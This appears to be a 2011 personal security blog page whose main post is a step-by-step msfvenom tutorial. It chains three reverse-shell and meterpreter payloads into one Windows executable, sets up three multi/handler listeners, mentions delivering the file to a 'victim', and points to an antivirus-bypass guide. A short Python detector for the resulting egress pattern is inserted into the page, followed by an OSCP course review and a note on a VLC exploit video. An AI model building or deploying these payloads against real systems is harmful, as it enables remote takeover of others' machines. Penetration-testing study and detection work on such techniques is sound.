Sunday, November 27, 2011

Binary Mischief With Msfencode

Good day Good Sirs
Today is a quick example of using msfencode. This is strictly the way I use it; there are more than likely better ways and methods, but this works for me. Hopefully you enjoy it. So here goes..

All of you may have heard of and/or used msfpayload and msfencode. But what you may not be aware of is msfvenom, which is basically a replacement for the two. As said before, this is only the way I use it. So first things first: running msfvenom with no arguments shows the help information. This is shown below.

[Screenshot of the msfvenom help output, not reproduced here.]

Now as you see, there are many options. I personally first decide what payload I'm going to use by opening another terminal and running msfpayload -l | grep "whatever you're looking for", for instance: ./msfpayload -l | grep windows/meterpreter/reverse, which would give you the output seen below.

[Screenshot of the msfpayload -l | grep output, not reproduced here.]

Now as you can see, we have a few payloads to choose from. I will be using windows/meterpreter/reverse_tcp.

So moving back to the terminal with msfvenom, I would run the following command; the options are explained below.
./msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.116 LPORT=4444 -f raw > /tmp/pay1

Command explanation:
-p: the chosen payload
LHOST=: the listening host
LPORT=: the listening port
-f: the format you want your payload output as
raw: I have used this because I intend to combine this payload with another one, so we don't want it built into an executable just yet. Basically it stays as raw shellcode for the time being.
> /tmp/pay1: tells msfvenom where to store our payload for later use.

Now decide what your next payload will be. Refer back to the msfpayload terminal and choose your next payload. I will be using windows/shell/reverse_tcp,
so my next command in the msfvenom terminal would be as follows.
./msfvenom -p windows/shell/reverse_tcp -f raw LHOST=192.168.1.116 LPORT=4443 -c /tmp/pay1 -k > /tmp/pay2

Command explanation:
-p: the payload to use
-f: the format to keep the payload in
LHOST=: the listening host
LPORT=: the listening port
-c: tells msfvenom that you want to combine extra shellcode with the current payload. Be sure to give the full path to the shellcode ("payload") to add.
-k: keeps the payload working by running it in its own thread.

Now decide on a third payload. I do this by referring back to my msfpayload terminal and picking from there. I will be using windows/meterpreter/reverse_tcp_allports, so the command will look like the one below. Pay attention, because now we will be adding all the payloads together and having the output format be an executable.

./msfvenom -p windows/meterpreter/reverse_tcp_allports -f exe LHOST=192.168.1.116 LPORT=2 -c /tmp/pay2 > /tmp/pay3.exe

Command explanation:
-p: the payload to be used
-f: the format for your payload
LHOST=: the listening host
LPORT=: the listening port
-c: tells msfvenom to add some shellcode. Be sure to give the full path to the shellcode you want to add.

Below is a picture of all three commands in succession.

[Screenshot of the three msfvenom commands, not reproduced here.]

Now you have three payloads in one, so you will need to set up three listeners. What I do is open three terminals and load msfconsole in each with the following commands:
cd /pentest/exploits/framework
./msfconsole

Doing that three times will get you three separate msfconsole sessions. Now to set up the listeners. Pick a terminal and do the following.
use exploit/multi/handler

Now tell it what to listen for. Our first payload had the following options, so just input these with the following commands:
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.116 <----or whatever your LHOST will be
set LPORT 4444 <----or whatever your LPORT will be
show options <----just to check all your options are set correctly.
exploit <----if all options were set correctly, using the exploit command will set your listener to start listening.

Now open a new msfconsole session for our second payload, using the following commands.
set PAYLOAD windows/shell/reverse_tcp
set LHOST 192.168.1.116 <----or whatever your LHOST will be
set LPORT 4443 <----or whatever your LPORT will be
show options <----just to check all your options are set correctly.
exploit <----if all options were set correctly, using the exploit command will set your listener to start listening.

Now on to listener three. In your third msfconsole session, input the following.
set PAYLOAD windows/meterpreter/reverse_tcp_allports
set LHOST 192.168.1.116 <----or whatever your LHOST will be
set LPORT 2 <----or whatever your LPORT will be
show options <----just to check all your options are set correctly.
exploit <----if all options were set correctly, using the exploit command will set your listener to start listening.

Now all that's left is to get your executable over to your victim. This would take imagination in a real-world pentest, but since I'm only testing, I simply copy it over to my web server, download the executable to my virtual machine and run it. If all went well, you will get three separate shells. This could certainly be useful in situations where you want to send a shell to different machines, i.e. you could have multiple LHOSTs, or if you're not sure what type of egress rulesets are in place. All in all, it's an amazing feature. Now notice I didn't do any encoding to bypass AV. That's because I will send you to a great write-up on bypassing anti-virus using a similar method. So if you take my "guide by example" and the following guide from http://www.fuzzysecurity.com/tutorials/3.html you should see some great results. I hope you enjoyed this quickly put together post. Please feel free to tell me what you'd like to see next. As always, goodnight and good luck.

http://www.fuzzysecurity.com/tutorials/3.html <--- check this out for encoding and bypassing anti-virus
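The defender's side of the same trick, as an added example that is not part of the original post: the three stacked payloads all call back to one LHOST, on 4444, 4443 and then every port upward from 2 (reverse_tcp_allports), so in egress firewall logs it looks like one internal host touching a single external address on several ports, including a consecutive run. The Python below scans constructed log lines for that pattern; the log format, hosts and thresholds are assumptions.

```python
from collections import defaultdict
from datetime import datetime
# Constructed egress firewall records ("timestamp src dst dport action").
# 10.0.0.25 mirrors the post's stacked payloads: 4444 and 4443 for the two
# reverse_tcp stages, then reverse_tcp_allports walking up from LPORT=2.
SAMPLE_LOG = """\
2011-11-27T20:01:02 10.0.0.25 192.168.1.116 4444 ALLOW
2011-11-27T20:01:02 10.0.0.25 192.168.1.116 4443 ALLOW
2011-11-27T20:01:03 10.0.0.25 192.168.1.116 2 DENY
2011-11-27T20:01:03 10.0.0.25 192.168.1.116 3 DENY
2011-11-27T20:01:04 10.0.0.25 192.168.1.116 4 DENY
2011-11-27T20:01:04 10.0.0.25 192.168.1.116 5 DENY
2011-11-27T20:02:10 10.0.0.31 93.184.216.34 443 ALLOW
2011-11-27T20:02:11 10.0.0.31 93.184.216.34 80 ALLOW
"""

def parse(log):
    out = []  # each line -> (ts, src, dst, dport, action)
    for line in log.splitlines():
        ts, src, dst, dport, action = line.split()
        out.append((datetime.fromisoformat(ts), src, dst, int(dport), action))
    return out

def longest_consecutive_run(ports):
    """Length of the longest run of consecutive port numbers in ports."""
    best, cur, prev = 0, 0, None
    for p in sorted(set(ports)):
        cur = cur + 1 if prev is not None and p == prev + 1 else 1
        best, prev = max(best, cur), p
    return best

def find_suspicious_egress(log, window_s=60, min_ports=3, min_run=4):
    """Flag (src, dst) pairs hitting >= min_ports distinct ports within window_s seconds, >= min_run of them consecutive."""
    by_pair = defaultdict(list)
    for ev in parse(log):
        by_pair[(ev[1], ev[2])].append(ev)
    findings = {}
    for pair, evs in by_pair.items():
        evs.sort()  # sliding time window over the pair's events
        lo = 0
        for hi in range(len(evs)):
            while (evs[hi][0] - evs[lo][0]).total_seconds() > window_s:
                lo += 1
            win = evs[lo:hi + 1]
            ports = {e[3] for e in win}
            run = longest_consecutive_run(ports)
            if len(ports) >= min_ports and run >= min_run:
                findings[pair] = {"ports": len(ports), "run": run, "denied": sum(e[4] == "DENY" for e in win)}
    return findings
```

A high denied count on the flagged pair is the allports payload hitting the egress filter; the two allowed high ports beside it are the fixed-port stages getting out.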

Saturday, November 12, 2011

OSCP Certified My Review and Bragging.

So if you know me, you know that I have been taking courses and certifications as fast as I can handle/afford. Well, a while back I took the PWBv3 course from Offensive Security. After a lot of pain/studying/hacking/googling and torture from Muts and Subinacls, I finished the course, and took and passed the exam. Script Alert("Applause"); /script
Well, I have finally received my certification in the mail... and if you want to see what it looks like, there will be a link at the end of the post. So I thought I should give a quick rambling of my thoughts on the course. First, coming into the course you're told that you can get help by talking to folks and fellow students on the IRC channel #offsec. This is true and false... If you have a question about how to gain a shell via XSS or which Metasploit exploit to use on a particular box, then my friend, you just asked in the wrong channel. You will certainly get either "google it", "try harder", or no reply at all. This can be frustrating, but if you ask for an admin and are having issues with the course material, or can't connect to a box, etc., then Bolexx, Subinacls, sickn3ss or another admin will have your issues sorted within minutes. I honestly never had to wait more than a minute or two before I was answered and back to hacking.
Also, there is a private forum, open only to students, with a ton of info, external links, downloads, videos, guides, wiki links, and general student conversation... there's even an entire topic on music suggestions.
Along with the forum and IRC channel, there are the course videos and PDF, which I think come to over 8 hours of video and 400 pages of offensive-security ninja-fu.
The thing that I loved about this course is simple. I didn't have to set up a pentesting lab at my house, or just learn from the theory explained in the PDFs. Offensive Security provided me with an entire network to attack. Actually, a network and three sub-networks. So as I learned new things and new attacks, I had a massive number of systems to attack, everything from Windows 2000 Server to Win7. I have heard rumours that there are some Macs hidden about; I unfortunately can't confirm this.
The course is extremely well covered. Basically, Muts takes you from boot to root, starting from just booting up BackTrack, to setting up services locally, to finally taking down services remotely. I would recommend this course to everyone who wants to learn a bit about security and a lot about yourself, as you will find out how deep down the rabbit hole you will go.
Also, another difference between this course and, say, CEH: the final exam isn't a 400-question written test. It's a 24-hour, active-attack pentest on a network that is totally new to you. Basically, you're given 24 hours to exploit a network and record details of your findings. Just like a real pentest, the documentation is very important. After the 24 hours, you have another 24 hours to organize your data and send in the findings for review/grading. It is said that Offsec can take up to three days to give your results, but I knew within 14 hours. In fact, I never had to wait long at all for a response from the folks at Offsec.
Final thoughts: anyone interested in being a pentester or security researcher, or who just wants to learn how their Facebook or bank account gets hacked and how to prevent it, should check this course out. It's intense, it's pricey, but 100 percent worth it. I would take it again and again. In fact, I have already taken the Wifu course offered by Offensive Security. I will be giving a review of that also, as soon as I get around to it. As promised, here is the link to the certification if you want to see it.
Now go get it for yourself if you want to see it. ^^^ That is all you need to get started.
If you want to test your skills against the offsec team for free, then check this out.


Try your hand at that. And as always, goodnight and good luck.
-g11tch-

Tomcat Becomes LoLCat

Saturday, November 5, 2011

Quick VLC Video

So like the title says, a quick video with the stars being VLC and Metasploit. As you can see, it's exploitable. This attack is on a Windows XP SP3 machine running AVG anti-virus. The video is nothing special, as you will see, and not hear: there is no audio. I would rather work on my exploitation than my video editing skills. So I hope you enjoy. Hopefully, at the very least, you will look twice at whatever file you're downloading from the net.
g11tch